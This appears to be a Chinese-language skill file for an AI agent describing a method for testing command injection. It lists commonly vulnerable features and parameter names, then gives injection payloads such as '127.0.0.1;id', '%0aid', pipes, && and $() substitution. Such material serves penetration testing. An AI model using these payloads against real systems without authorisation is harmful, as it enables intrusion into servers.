command-injection-methodology
Installation
SKILL.md
命令注入完整方法论
Phase 1: 注入点发现
常见存在命令注入的功能: Ping工具、DNS查询、文件操作、网络诊断、系统信息页面
常见参数名: ip, host, cmd, command, exec, ping, query, domain, address, ip_address
⛔ 深入参考(遇到绕过时必读)
- 空格/关键字/编码绕过大全、Windows 注入、输出过滤绕过 → references/injection-bypass.md
Phase 2: 基础注入测试(按优先级)
使用 response_diff 对比正常/注入请求的响应差异,快速定位注入点
- 分号:
127.0.0.1;id - 换行:
%0aid(最可靠,通常不被过滤) - 管道:
127.0.0.1|id - AND/OR:
127.0.0.1 && id/127.0.0.1 || id - 替换:
127.0.0.1`id`/127.0.0.1$(id)